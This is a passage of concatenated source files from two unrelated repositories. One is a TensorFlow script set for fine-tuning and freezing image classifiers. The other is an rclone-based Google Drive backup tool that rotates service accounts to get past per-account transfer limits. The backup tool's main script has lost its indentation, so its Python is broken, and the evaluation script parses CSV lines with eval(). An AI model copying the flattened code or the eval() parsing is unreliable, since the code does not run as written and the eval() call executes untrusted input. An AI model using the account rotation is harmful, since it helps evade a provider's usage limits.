            head = slim.fully_connected(head, 256, activation_fn=tf.nn.relu, scope='Logits_out0')
            head = slim.fully_connected(head, num_classes, activation_fn=None, scope='Logits_out1')
    return head
def arch_resnet_v2_50(X, num_classes, dropout_keep_prob=0.8, is_train=False):
    """ResNet-v2-50 backbone with a 1x1-conv classification head.

    The head (scope 'Logits_out') runs three 1x1 conv stages
    (1000 -> 200 -> num_classes) with dropout in between, then squeezes
    the 1x1 spatial dims to yield (batch, num_classes) logits.
    """
    with slim.arg_scope(resnet_arg_scope()):
        backbone, _ = resnet_v2_50(X, is_training=is_train)
    with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
        with tf.variable_scope('Logits_out'):
            head = slim.conv2d(backbone, 1000, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out0')
            head = slim.dropout(head, dropout_keep_prob, scope='Dropout_1b_out0')
            head = slim.conv2d(head, 200, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out1')
            head = slim.dropout(head, dropout_keep_prob, scope='Dropout_1b_out1')
            head = slim.conv2d(head, num_classes, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out2')
            head = tf.squeeze(head, [1, 2], name='SpatialSqueeze')
    return head
def arch_vgg16(X, num_classes, dropout_keep_prob=0.8, is_train=False):
    """VGG-16 backbone with a single 1x1-conv head replacing fc8.

    Note: dropout_keep_prob is accepted for interface symmetry with the
    other arch_* builders but is not used here.
    """
    with slim.arg_scope(vgg_arg_scope()):
        backbone, _ = vgg_16(X, is_training=is_train)
    with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
        with tf.variable_scope('Logits_out'):
            head = slim.conv2d(backbone, num_classes, [1, 1], activation_fn=None, normalizer_fn=None, scope='fc8')
            head = tf.squeeze(head, [1, 2], name='fc8/squeezed')
    return head
def g_parameter(checkpoint_exclude_scopes):
    """Split model variables into (restore-from-checkpoint, train-from-scratch).

    Variables whose op name starts with any comma-separated scope in
    checkpoint_exclude_scopes are trained; all the others are restored.
    """
    exclusions = []
    if checkpoint_exclude_scopes:
        exclusions = [scope.strip() for scope in checkpoint_exclude_scopes.split(',')]
    print (exclusions)
    variables_to_restore = []  # parameters loaded from the checkpoint
    variables_to_train = []    # parameters updated by the optimizer
    # Iterate slim model variables.  Do NOT switch this to
    # tf.trainable_variables() — per the original author that substitution
    # was a severe bug that took three days to track down.
    for var in slim.get_model_variables():
        matched = next((s for s in exclusions if var.op.name.startswith(s)), None)
        if matched is not None:
            variables_to_train.append(var)
            print ("ok")
            print (var.op.name)
        else:
            variables_to_restore.append(var)
    return variables_to_restore,variables_to_train
def train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size=64,keep_prob=0.8,
    arch_model="arch_inception_v4",checkpoint_exclude_scopes="Logits_out", checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"):
    """Fine-tune a slim CNN (inception_v4 / resnet_v2_50 / vgg_16).

    Builds the graph, restores backbone weights from checkpoint_path
    (excluding checkpoint_exclude_scopes, which are trained from scratch),
    then runs `epoch` passes over the training data with periodic
    validation, TensorBoard summaries, and checkpointing to
    'model/fine-tune' whenever the per-epoch validation accuracy
    exceeds 0.90.

    Side effects: creates '<arch_model>_log' for summaries, writes model
    checkpoints, and prints progress to stdout.
    """
    X = tf.placeholder(tf.float32, [None, IMAGE_HEIGHT, IMAGE_WIDTH, 3])
    #Y = tf.placeholder(tf.float32, [None, 4])
    Y = tf.placeholder(tf.float32, [None, num_classes])
    is_training = tf.placeholder(tf.bool, name='is_training')
    k_prob = tf.placeholder(tf.float32) # dropout
    # Build the selected model architecture.
    if arch_model == "arch_inception_v4":
        net = arch_inception_v4(X, num_classes, k_prob, is_training)
    elif arch_model == "arch_resnet_v2_50":
        net = arch_resnet_v2_50(X, num_classes, k_prob, is_training)
    elif arch_model == "vgg_16":
        net = arch_vgg16(X, num_classes, k_prob, is_training)
    # Split variables into restore-from-checkpoint vs. train-from-scratch.
    variables_to_restore,variables_to_train = g_parameter(checkpoint_exclude_scopes)
    # Loss function (sigmoid cross-entropy; softmax variant kept for reference).
    loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = Y, logits = net))
    # loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = Y, logits = net))
    var_list = variables_to_train
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    # Run pending update ops (e.g. batch-norm statistics) before each step.
    with tf.control_dependencies(update_ops):
        optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss, var_list=var_list)
    predict = tf.reshape(net, [-1, num_classes])
    max_idx_p = tf.argmax(predict, 1)
    max_idx_l = tf.argmax(Y, 1)
    correct_pred = tf.equal(max_idx_p, max_idx_l)
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
    # TensorBoard summaries.
    with tf.name_scope('tmp/'):
        tf.summary.scalar('loss', loss)
        tf.summary.scalar('accuracy', accuracy)
    summary_op = tf.summary.merge_all()
    #------------------------------------------------------------------------------------#
    sess = tf.Session()
    init = tf.global_variables_initializer()
    sess.run(init)
    # Summary/log directory is named after the architecture.
    log_dir = arch_model + '_log'
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    writer = tf.summary.FileWriter(log_dir, sess.graph)
    saver2 = tf.train.Saver(tf.global_variables())
    model_path = 'model/fine-tune'
    net_vars = variables_to_restore
    saver_net = tf.train.Saver(net_vars)
    # checkpoint_path = 'pretrain/inception_v4.ckpt'
    saver_net.restore(sess, checkpoint_path)
    # saver2.restore(sess, "model/fine-tune-1120")
    for epoch_i in range(epoch):
        for batch_i in range(int(train_n/batch_size)):
            images_train, labels_train = get_next_batch_from_path(train_data, train_label, batch_i, IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=True)
            los, _ = sess.run([loss,optimizer], feed_dict={X: images_train, Y: labels_train, k_prob:keep_prob, is_training:True})
            # print (los)
            if batch_i % 100 == 0:
                # Every 100 batches: validate on a single validation batch.
                images_valid, labels_valid = get_next_batch_from_path(valid_data, valid_label, batch_i%(int(valid_n/batch_size)), IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=False)
                ls, acc = sess.run([loss, accuracy], feed_dict={X: images_valid, Y: labels_valid, k_prob:1.0, is_training:False})
                print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, ls, acc))
                #if acc > 0.90:
                #    saver2.save(sess, model_path, global_step=batch_i, write_meta_graph=False)
            elif batch_i % 20 == 0:
                # Every 20 batches: training metrics + TensorBoard summary.
                loss_, acc_, summary_str = sess.run([loss, accuracy, summary_op], feed_dict={X: images_train, Y: labels_train, k_prob:1.0, is_training:False})
                writer.add_summary(summary_str, global_step=((int(train_n/batch_size))*epoch_i+batch_i))
                print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss_, acc_))
        print('Epoch===================================>: {:>2}'.format(epoch_i))
        valid_ls = 0
        valid_acc = 0
        for batch_i in range(int(valid_n/batch_size)):
            images_valid, labels_valid = get_next_batch_from_path(valid_data, valid_label, batch_i, IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=False)
            epoch_ls, epoch_acc = sess.run([loss, accuracy], feed_dict={X: images_valid, Y: labels_valid, k_prob:1.0, is_training:False})
            valid_ls = valid_ls + epoch_ls
            valid_acc = valid_acc + epoch_acc
        print('Epoch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(epoch_i, valid_ls/int(valid_n/batch_size), valid_acc/int(valid_n/batch_size)))
        if valid_acc/int(valid_n/batch_size) > 0.90:
            saver2.save(sess, model_path, global_step=epoch_i, write_meta_graph=False)
        print('>>>>>>>>>>>>>>>>>>>shuffle train_data<<<<<<<<<<<<<<<<<')
        # Re-shuffle the training set once per epoch.
        train_data, train_label = shuffle_train_data(train_data, train_label)
    writer.close()
    sess.close()
if __name__ == '__main__':
    IMAGE_HEIGHT = 299
    IMAGE_WIDTH = 299
    num_classes = 4
    # Number of training epochs.
    epoch = 100
    batch_size = 16
    # Learning rate of the model.
    learning_rate = 0.00001
    keep_prob = 0.8
    ##----------------------------------------------------------------------------##
    # Fraction of all samples used for training.
    train_rate = 0.9
    # Dataset root: one sub-directory per class (any two-level layout works).
    craterDir = "train"
    # arch_model="arch_inception_v4"; arch_model="arch_resnet_v2_50"; arch_model="vgg_16"
    arch_model="arch_inception_v4"
    checkpoint_exclude_scopes = "Logits_out"
    checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"
    ##----------------------------------------------------------------------------##
    X_sample, Y_sample = load_database_path(craterDir)
    image_n = len(X_sample)
    # Total number of samples.
    print ("样本的总数量:")
    print (image_n)
    # First 90% of the shuffled samples are used for training.
    train_n = int(image_n*train_rate)
    valid_n = int(image_n*(1-train_rate))
    train_data, train_label = X_sample[0:train_n], Y_sample[0:train_n]
    # The remaining 10% are used for validation.
    valid_data, valid_label = X_sample[train_n:image_n], Y_sample[train_n:image_n]
    # One-hot encode the labels.
    train_label = np_utils.to_categorical(train_label, num_classes)
    valid_label = np_utils.to_categorical(valid_label, num_classes)
    ##----------------------------------------------------------------------------##
    print ("-----------------------------train.py start--------------------------")
    train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size,keep_prob,
        arch_model,checkpoint_exclude_scopes, checkpoint_path)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import tensorflow as tf
slim = tf.contrib.slim
import os.path
import argparse
from tensorflow.python.framework import graph_util
from inception_v4 import *
from inception_preprocessing import *
MODEL_DIR = "model/"
MODEL_NAME = "frozen_model.pb"
if not tf.gfile.Exists(MODEL_DIR): # Create the output directory if it is missing.
    tf.gfile.MakeDirs(MODEL_DIR)
batch_size = 32
height, width = 299, 299
num_classes = 3
# Input placeholder; its name must match what freeze_graph later looks up.
X = tf.placeholder(tf.float32, [None, height, width, 3], name = "inputs_placeholder")
'''
X = tf.placeholder(tf.uint8, [None, None, 3],name = "inputs_placeholder")
X = tf.image.encode_jpeg(X, format='rgb') # 单通道用 'grayscale'
X = tf.image.decode_jpeg(X, channels=3)
X = preprocess_for_eval(X, 299,299)
X = tf.reshape(X, [-1,299,299,3])'''
Y = tf.placeholder(tf.float32, [None, num_classes])
#keep_prob = tf.placeholder(tf.float32) # dropout
#keep_prob_fc = tf.placeholder(tf.float32) # dropout
# Rebuild the inference graph: inception_v4 backbone ...
arg_scope = inception_v4_arg_scope()
with slim.arg_scope(arg_scope):
    net, end_points = inception_v4(X, is_training=False)
#sess1 = tf.Session()
#saver1 = tf.train.Saver(tf.global_variables())
#checkpoint_path = 'model/inception_v4.ckpt'
#saver1.restore(sess1, checkpoint_path)
# ... plus the custom 'Logits_out' head (must match the training graph).
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
    with tf.variable_scope('Logits_out'):
        # 8 x 8 x 1536
        net = slim.avg_pool2d(net, net.get_shape()[1:3], padding='VALID',
                          scope='AvgPool_1a_out')
        # 1 x 1 x 1536; keep_prob fixed to 1.0 — inference only, no dropout.
        dropout_keep_prob = 1.0
        net = slim.dropout(net, dropout_keep_prob, scope='Dropout_1b_out')
        net = slim.flatten(net, scope='PreLogitsFlatten_out')
        # 1536
        net = slim.fully_connected(net, 256, activation_fn=tf.nn.relu, scope='Logits_out0')
        net = slim.fully_connected(net, num_classes, activation_fn=None,scope='Logits_out1')
# net = tf.nn.softmax(net)
net = tf.nn.sigmoid(net)
# Output tensor; 'predictions' is the node frozen into the .pb below.
predict = tf.reshape(net, [-1, num_classes], name='predictions')
for var in tf.trainable_variables():
    print (var.op.name)
def freeze_graph(model_folder):
    """Freeze the checkpoint at model_folder into a single constant-only .pb.

    Restores variables from the checkpoint, folds them into the graph as
    constants, and writes MODEL_DIR/MODEL_NAME.  Afterwards reloads the
    frozen .pb and prints its op names as a sanity check.
    """
    #checkpoint = tf.train.get_checkpoint_state(model_folder) # Check whether the ckpt files in the folder are usable.
    #input_checkpoint = checkpoint.model_checkpoint_path # Path of the ckpt file.
    input_checkpoint = model_folder
    output_graph = os.path.join(MODEL_DIR, MODEL_NAME) # Where the frozen PB model is saved.
    output_node_names = "predictions" # Name of the output op in the original model.
    #saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=True) # Load the graph; clear_devices: whether or not to clear the device field for an `Operation` or `Tensor` during import.
    saver = tf.train.Saver()
    graph = tf.get_default_graph() # Get the default graph.
    input_graph_def = graph.as_graph_def() # Serialized GraphDef representing the current graph.
    with tf.Session() as sess:
        sess.run(tf.initialize_all_variables())
        saver.restore(sess, input_checkpoint) # Restore the graph and its weights.
        #print "predictions : ", sess.run("predictions:0", feed_dict={"input_holder:0": [10.0]}) # Quick check that the restored model works; note these are output/input tensor names, not op names.
        output_graph_def = graph_util.convert_variables_to_constants( # Persist the model: freeze variable values into constants.
            sess,
            input_graph_def,
            output_node_names.split(",") # Comma-separate multiple output nodes.
        )
        with tf.gfile.GFile(output_graph, "wb") as f: # Save the frozen model.
            f.write(output_graph_def.SerializeToString()) # Serialize and write.
        print("%d ops in the final graph." % len(output_graph_def.node)) # Number of ops in the final graph.
        for op in graph.get_operations():
            #print(op.name, op.values())
            print("name:",op.name)
        print ("success!")
    # Self-test: reload the frozen .pb and print every variable/op name.
    graph = load_graph("model/frozen_model.pb")
    for op in graph.get_operations():
        #print(op.name, op.values())
        print("name111111111111:",op.name)
    pred = graph.get_tensor_by_name('prefix/inputs_placeholder:0')
    print (pred)
    temp = graph.get_tensor_by_name('prefix/predictions:0')
    print (temp)
def load_graph(frozen_graph_filename):
    """Load a frozen GraphDef (.pb) and import it into a fresh tf.Graph.

    Every imported op ends up under the "prefix/" name scope.
    """
    # Parse the serialized protobuf from disk.
    graph_def = tf.GraphDef()
    with tf.gfile.GFile(frozen_graph_filename, "rb") as pb_file:
        graph_def.ParseFromString(pb_file.read())
    # Import into a new graph so the default graph stays untouched.
    with tf.Graph().as_default() as graph:
        tf.import_graph_def(graph_def, input_map=None, return_elements=None,
                            name="prefix", op_dict=None, producer_op_list=None)
    return graph
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("model_folder", type=str, help="input ckpt model dir", default="model/cnn_model-1700") # Command-line parsing: help is the hint text, type the argument type.
    # Run the program with the ckpt model path as an argument, otherwise
    # argparse reports: error: too few arguments
    aggs = parser.parse_args()
    freeze_graph(aggs.model_folder)
    # freeze_graph("model/ckpt") # Model directory.
    # python ckpt_pb.py "model/fine-tune-160"
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng"""
import numpy as np
import numpy as np
import os
from PIL import Image
import cv2
import csv
import argparse, json, textwrap
import sys
import csv
def result2num(out, image_path):
    """Map the top-scoring class for image_path to a numeric label.

    Looks up the prediction dict for image_path, drops a truthy 'help'
    entry if present (mutating the dict in place), then returns 0/1/2 for
    a top class of NG1/NG2/OK respectively, or None for any other class.
    """
    scores = out[image_path]
    if scores.get("help", ""):
        print ("help is true!")
        scores.pop('help')
    print (">>>>>>>>", scores)
    # Order classes by score, highest first (stable for equal scores).
    ranked = sorted(scores.items(), key=lambda item: item[1], reverse=True)
    top_class = ranked[0][0]
    mapping = {'NG1': 0, 'NG2': 1, 'OK': 2}
    return mapping.get(top_class)
# Evaluate predictions in output.csv: each line is a dict literal mapping an
# image path to its per-class scores; compare the predicted class with the
# class name embedded in the path and report overall accuracy.
file = open("output.csv", "r")
err_num = 0
sample_num = 0
for r in file:
    sample_num = sample_num + 1
    # Parse the line into a dict.
    # NOTE(review): eval() executes arbitrary code — only run this on a
    # trusted output.csv (ast.literal_eval would be the safe alternative).
    r = eval(r)
    # Extract the image path (the dict's only key).
    image_path = list(r.keys())
    # Sentinel: stays at this value if the path holds an unknown class name.
    la = 888888888888888
    # Ground-truth class name is the second path component.
    label = str (str(image_path[0]).split('/')[1])
    # print (label)
    if label == 'NG1':
        la = 0
    if label == 'NG2':
        la = 1
    if label == 'OK':
        la = 2
    print (la)
    image_path = str(image_path[0])
    res = result2num(r, image_path)
    print (res)
    if (la != res):
        err_num = err_num + 1
print (sample_num)
print (err_num)
acc_num = sample_num - err_num
print ('accuracy >>> ', acc_num/sample_num)
|
[
"/config.py",
"/data_aug/data_aug.py",
"/load_image/load_image.py",
"/main.py",
"/train_net/train_tensorboard.py",
"/z_ckpt_pb/ckpt_pb.py",
"/z_ckpt_pb/test.py"
] |
001kyaw/gdriveautobackupsystem
|
import json
import io
import subprocess
import sys
import time
from signal import signal, SIGINT
from util import arg_parser, config_gen, helpers
import hashlib
PID = 0
# Parameters for script
MAX_TRANSFER_BYTES = (740 * 1e9) # If one account has already copied 740GB (740 * 1e9), switch to next account
TRANSFER_DEAD_THRESHOLD = 60 # If no bytes are transferred after 60 loops (120 seconds), exit
SA_EXIT_TRESHOLD = 3 # If SAs are switched 3 successive times with no transfers, exit
# Exit handler that kills the RClone process when the script is terminated.
def exit_handler(signal_received, frame):
    """SIGINT handler: force-kill the tracked RClone process, then exit 0."""
    global PID
    # Pick the platform-specific force-kill command.
    template = 'taskkill /PID {} /F' if helpers.is_windows() else 'kill -9 {}'
    kill_cmd = template.format(PID)
    try:
        subprocess.check_call(kill_cmd, shell=True)
    except:
        pass  # best effort — the process may already be gone
    sys.exit(0)
# Main function, everything is executed from here
def main():
# Sets the scripts SIGINT handler to our exit_handler
signal(SIGINT, exit_handler)
# Check if RClone is installed, if it isn't, exit
ret = helpers.check_rclone_exists()
# Parse args
args = arg_parser.parse_args()
# Log that rclone was detected
helpers.log('RClone detected: {}'.format(ret), 'INFO', args)
# Generate config
rclone_generated_config_path = args.generated_config_path
source_path = ''
# Use either source remote or source path, if neither exist exit
if args.source:
source_path = args.source
elif args.source_path:
source_path = args.source_path
else:
helpers.log('A source is required, please use either --source or --source_path.', 'ERROR', args)
sys.exit(-1)
# If both a remote and a path exist combine them using RClone syntax
if args.source and args.source_path:
source_path += ":" + args.source_path
# See comments above
destination_path = ''
if args.destination:
destination_path = args.destination
elif args.destination_path:
destination_path = args.destination_path
else:
helpers.log('A destination is required, please use either --destination or --destination_path.', 'ERROR', args)
sys.exit(-1)
if args.destination and args.destination_path:
destination_path += ":" + args.destination_path
# Set id initially to the starting SA id
id = args.sa_start_id
end_id = args.sa_end_id
helpers.log('Generating RClone config file...', 'INFO', args)
# Generate RClone config file
end_id, src_is_crypt, dst_is_crypt = config_gen.gen_rclone_cfg(args, rclone_generated_config_path)
time_start = time.time()
helpers.log('Starting job: {}, at {}'.format(args.name, time.strftime('%H:%M:%S')), 'INFO', args)
helpers.log('Source: ' + source_path, 'INFO', args)
helpers.log('Destination: ' + destination_path, 'INFO', args)
helpers.log('AutoRClone Log: ' + args.log_file, 'INFO', args)
helpers.log('RClone Log: ' + args.rclone_log_file, 'INFO', args)
helpers.log('Calculating source size, please wait', 'INFO', args)
# Initialise exit counter outside of loop so it keeps it's value
exit_counter = 0
error_counter = 0
global_bytes_transferred = 0
while id <= end_id + 1:
if id == end_id + 1:
break
# Construct destination and source labels
src_label = 'src' + '{0:03d}'.format(id) + ':'
dst_label = 'dst' + '{0:03d}'.format(id) + ':'
if src_is_crypt:
src_label = 'src' + '{0:03d}_crypt'.format(id) + ':'
if dst_is_crypt:
dst_label = 'dst' + '{0:03d}_crypt'.format(id) + ':'
# Fix for local paths that do not use a remote
if args.source_path:
if not args.source:
src_label = args.source_path
else:
src_label += args.source_path
if args.destination_path:
if not args.destination:
dst_label = args.destination_path
else:
dst_label += args.destination_path
if id == args.sa_start_id:
amount_to_transfer_bytes = helpers.calculate_path_size(src_label, rclone_generated_config_path)
amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
helpers.log('Source size: ' + amount_to_transfer + '\n', 'INFO', args)
# Construct RClone command
rclone_cmd = 'rclone --config {} '.format(rclone_generated_config_path)
if args.copy:
rclone_cmd += 'copy '
elif args.move:
rclone_cmd += 'move '
elif args.sync:
rclone_cmd += 'sync '
else:
helpers.log('Please specify an operation (--copy, --move or --sync)', 'ERROR', args)
sys.exit()
rclone_cmd += '--drive-server-side-across-configs --drive-acknowledge-abuse --ignore-existing --rc '
rclone_cmd += '--rc-addr=\"localhost:{}\" --tpslimit {} --transfers {} --drive-chunk-size {} --bwlimit {} --log-file {} '.format(
args.port, args.tpslimit, args.transfers, args.drive_chunk_size, args.bwlimit, args.rclone_log_file)
if args.dry_run:
rclone_cmd += '--dry-run '
if args.v:
rclone_cmd += '-v '
if args.vv:
rclone_cmd += '-vv '
if args.delete_empty_src_dirs:
rclone_cmd += '--delete-empty-src-dirs '
if args.create_empty_src_dirs:
rclone_cmd += '--create-empty-src-dirs '
# Add source and destination
rclone_cmd += '\"{}\" \"{}\"'.format(src_label, dst_label)
# If we're not on windows append ' &' otherwise append 'start /b ' to the start of rclone_cmd
if not helpers.is_windows():
rclone_cmd = rclone_cmd + " &"
else:
rclone_cmd = "start /b " + rclone_cmd
try:
subprocess.check_call(rclone_cmd, shell=True)
helpers.log('Executing RClone command: {}'.format(rclone_cmd), 'DEBUG', args)
time.sleep(10)
except subprocess.SubprocessError as error:
helpers.log('Error executing RClone command: {}'.format(error), 'ERROR', args)
sys.exit(-1)
# Counter for errors encountered when attempting to get RClone rc stats (per sa)
sa_error_counter = 0
# Counter that's incremented when no bytes are transferred over a time period
dead_transfer_counter = 0
# Updated on each loop
last_bytes_transferred = 0
# Counter for amount of successful stat retrievals from RClone rc (per sa)
sa_success_counter = 0
job_started = False
# Get RClone PID and store it
try:
response = subprocess.check_output('rclone rc --rc-addr="localhost:{}" core/pid'.format(args.port), shell=True, stderr=subprocess.DEVNULL)
pid = json.loads(response.decode('utf-8').replace('\0', ''))['pid']
global PID
PID = int(pid)
except subprocess.SubprocessError as error:
pass
# Loop infinitely until loop is broken out of
while True:
# RClone rc stats command
rc_cmd = 'rclone rc --rc-addr="localhost:{}" core/stats'.format(args.port)
try:
# Run command and store response
response = subprocess.check_output(rc_cmd, shell=True, stderr=subprocess.DEVNULL)
# Increment success counter
sa_success_counter += 1
# Reset error counter
sa_error_counter = 0
if job_started and sa_success_counter >= 9:
sa_error_counter = 0
sa_success_counter = 0
except subprocess.SubprocessError as error:
sa_error_counter += 1
error_counter = error_counter + 1
if sa_error_counter >= 3:
sa_success_counter = 0
if error_counter >= 9:
finish_job(args, time_start)
sys.exit(0)
helpers.log('Encountered 3 successive errors when trying to contact rclone, switching accounts ({}/3)'.format(error_counter/sa_error_counter), 'INFO', args)
break
continue
response_processed = response.decode('utf-8').replace('\0', '')
response_processed_json = json.loads(response_processed)
bytes_transferred = int(response_processed_json['bytes'])
checks_done = int(response_processed_json['checks'])
transfer_speed_bytes = (bytes_transferred - last_bytes_transferred) / 4
# I'm using The International Engineering Community (IEC) Standard, eg. 1 GB = 1000 MB, if you think otherwise, fight me!
best_unit_transferred = helpers.convert_bytes_to_best_unit(bytes_transferred)
transfer_speed = helpers.convert_bytes_to_best_unit(transfer_speed_bytes)
#transfers = response_processed_json['transferring']
#for file in transfers:
# name = file['name']
# name_hashed = hashlib.sha1(bytes(name, encoding='utf8')).hexdigest()
# size_bytes = file['size']
# helpers.log('File: {} ({}) is {} bytes'.format(name, name_hashed, size_bytes), 'DEBUG', args)
# if not name_hashed in file_names:
# file_names.append(name_hashed)
# file_sizes.append(size_bytes)
#helpers.log("file_names = " + str(file_names), 'DEBUG', args)
#helpers.log("file_sizes = " + str(file_sizes), 'DEBUG', args)
#amount_to_transfer_bytes = sum(file_sizes)
#amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
bytes_left_to_transfer = int(amount_to_transfer_bytes) - bytes_transferred
eta = helpers.calculate_transfer_eta(bytes_left_to_transfer, transfer_speed_bytes)
helpers.log('{}/{} @ {}/s Files Checked: {} SA: {} ETA: {}'.format(best_unit_transferred, amount_to_transfer, transfer_speed, checks_done, id, eta) + (" " * 10), "INFO", args, end='\r')
    # Detect a stalled transfer: count consecutive polls with no new bytes moved.
if bytes_transferred - last_bytes_transferred == 0:
dead_transfer_counter += 1
helpers.log('No bytes transferred, RClone may be dead ({}/{})'.format(dead_transfer_counter, TRANSFER_DEAD_THRESHOLD) + (" " * 10), 'DEBUG', args)
else:
dead_transfer_counter = 0
job_started = True
last_bytes_transferred = bytes_transferred
# Stop by error (403, etc) info
if bytes_transferred >= MAX_TRANSFER_BYTES or dead_transfer_counter >= TRANSFER_DEAD_THRESHOLD:
if helpers.is_windows():
kill_cmd = 'taskkill /PID {} /F'.format(PID)
else:
kill_cmd = "kill -9 {}".format(PID)
try:
subprocess.check_call(kill_cmd, shell=True)
helpers.log('Transfer limit reached or RClone is not transferring any data, switching service accounts', 'INFO', args)
amount_to_transfer_bytes -= bytes_transferred
amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
global_bytes_transferred += bytes_transferred
except:
pass
if dead_transfer_counter >= TRANSFER_DEAD_THRESHOLD:
try:
exit_counter += 1
except:
exit_counter = 1
else:
    # Reset the exit counter: this switch was triggered by the transfer
    # limit, not by a dead (stalled) transfer.
exit_counter = 0
# Regard continually exit as *all done*.
if exit_counter >= SA_EXIT_TRESHOLD:
# Exit directly rather than switch to next account.
finish_job(args, time_start)
sys.exit(0)
break
time.sleep(4)
id = id + 1
# TODO implement
def finish_job(args, time_start):
helpers.log('Job FINISHED (this message will be better soon)', 'INFO', args)
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
class Config:
AAA = "--help"
BBB = "what"
CCC = "fuck"
--- FILE SEPARATOR ---
import os
os.system('hickory schedule back.py --every=1hours')
--- FILE SEPARATOR ---
# coding: utf-8
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='Copy from source (local/publicly shared drive/Team Drive/) '
'to destination (publicly shared drive/Team Drive).')
parser.add_argument('--copy', action='store_true',
help='Copy files from source to destination.')
parser.add_argument('--move', action='store_true',
help='Move files from source to destination.')
parser.add_argument('--sync', action='store_true',
help='Sync the source to the destination, changing the destination only. Doesn’t transfer unchanged files.')
parser.add_argument('-s', '--source', type=str,
help='The source of your files. ID of Team Drive, ID of publicly shared folder or an RClone remote (Must use --rclone-config-path).')
parser.add_argument('-d', '--destination', type=str,
help='The destination for your files. ID of Team Drive, ID of publicly shared folder or an RClone remote (Must use --rclone-config-path).')
parser.add_argument('-sp', '--source-path', type=str, default='',
help='The folder path inside source. (Local Path or path in Google Drive).')
parser.add_argument('-dp', '--destination-path', type=str, default='',
help='The folder path inside the destination. (Local path or path in Google Drive).')
parser.add_argument('-n', '--name', type=str, default='untitled',
help='Name your AutoRClone job, AutoRClone creates a log for each job, naming your jobs may be beneficial.')
parser.add_argument('--log-file', type=str, default='logs/AutoRClone.log',
help='Path to log file.')
parser.add_argument('--rclone-log-file', type=str, default='logs/rclone.log',
help='Path to RClone log file.')
parser.add_argument('--service-account-dir', type=str, default='accounts',
help='The directory path of json files for service account credentials.')
parser.add_argument('-p', '--port', type=int, default=5572,
help='the port to run RClone rc. set it to different one if you want to run other instance.')
parser.add_argument('--sa-start-id', type=int, default=1,
help='Service account id to start with.')
parser.add_argument('--sa-end-id', type=int, default=600,
help='Service account id to end with.')
parser.add_argument('--rclone-config-path', type=str,
help='Path to existing config file with the source and destination remotes.')
parser.add_argument('--dry-run', action='store_true',
help='For testing: make RClone dry-run.')
parser.add_argument('--bwlimit', type=str, default='0',
help='Specify the desired bandwidth in kBytes/s, or use a suffix b|k|M|G. The default is 0 which means to not limit bandwidth. eg. 10M')
parser.add_argument('--tpslimit', type=float, default=4,
help='Set the maximum amount of HTTP transactions per second. Use 0 used when no limit is required.')
parser.add_argument('--transfers', type=int, default=4,
help='Sets the number of file transfers to be run in parallel.')
parser.add_argument('--drive-chunk-size', type=str, default='8M',
help='Upload chunk size. Must a power of 2 >= 256k. Making this larger will improve performance, but note that each chunk is buffered in memory one per transfer.')
parser.add_argument('--delete-empty-src-dirs', action='store_true',
help='Delete empty source dirs after move.')
parser.add_argument('--create-empty-src-dirs', action='store_true',
help='Create empty source dirs on destination after sync.')
parser.add_argument('-v', action='store_true',
help='Outputs RClone information to log file about each transfer and prints stats once a minute by default.')
parser.add_argument('-vv', action='store_true',
help='Outputs lots of RClone debug info to the log file - useful for bug reports and really finding out what RClone is doing.')
parser.add_argument('--debug', action='store_true',
help='Prints AutoRClone debug information, saves output to log file.')
parser.add_argument('--generated-config-path', type=str, default='./rclone-generated.conf',
help='Desired path of the generated config file.')
args = parser.parse_args()
return args
--- FILE SEPARATOR ---
import os
import json
from distutils.util import strtobool as stb
# --------------------------------------
first = ""
second = ""
third = ""
# Example: OWNER_ID = 619418070
# dont edit below this >
first = os.environ.get('first', first)
second = os.environ.get('second', second)
third = os.environ.get('third', third)
--- FILE SEPARATOR ---
import glob
import os
import sys
from util import config_parser
from pathlib import Path
from util.helpers import log
def gen_remote_template(src_or_dest, parsed_config, args, is_config_file_specified):
remote_template = None
found = False
remote_is_crypt = False
if is_config_file_specified:
for remote in parsed_config:
if remote.remote_name == src_or_dest:
found = True
if isinstance(remote, config_parser.crypt_remote):
crypt_remote_parts = remote.remote.split(':')
unencrypted_remote_found = False
remote_is_crypt = True
for unencrypted_remote in parsed_config:
if unencrypted_remote.remote_name == crypt_remote_parts[0]:
